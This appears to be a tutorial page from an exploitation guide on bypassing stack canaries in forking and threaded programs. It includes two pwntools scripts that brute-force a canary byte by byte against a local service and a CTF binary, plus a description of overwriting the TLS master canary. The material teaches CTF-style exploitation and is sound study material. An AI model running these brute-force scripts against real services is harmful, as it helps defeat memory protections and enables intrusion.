BF Forked & Threaded Stack Canaries
[AD REMOVED]
If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.
[!NOTE] Note that
checksec
might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
Brute force Canary
The best way to bypass a simple canary is if the binary is a program forking child processes every time you establish a new connection with it (network service), because every time you connect to it the same canary will be used.
Then, the best way to bypass the canary is just to brute-force it char by char, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function brute-forces an 8 Bytes canary (x64) and distinguish between a correct guessed byte and a bad byte just checking if a response is sent back by the server (another way in other situation could be using a try/except):
Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits.
from pwn import *
def connect():
r = remote("localhost", 8788)
def get_bf(base):
canary = ""
guess = 0x0
base += canary
while len(canary) < 8:
while guess != 0xff:
r = connect()
r.recvuntil("Username: ")
r.send(base + chr(guess))
if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base
canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\ Also note that for this example the program expected first a byte to indicate the size of the input and the payload.
from pwn import *
# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21
for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))
# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break
# Return the canary
return known_canary
# Start the target process
target = process('./feedme')
#gdb.attach(target)
# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
Threads
Threads of the same process will also share the same canary token, therefore it'll be possible to brute-force a canary if the binary spawns a new thread every time an attack happens.
Moreover, a buffer overflow in a threaded function protected with canary could be used to modify the master canary stored in the TLS. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a bof in the stack of a thread.\ As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\ This attack is performed in the writeup: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads
Check also the presentation of https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015 which mentions that usually the TLS is stored by mmap
and when a stack of thread is created it's also generated by mmap
according to this, which might allow the overflow as shown in the previous writeup.
Other examples & references
- https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call
execve
and jump there.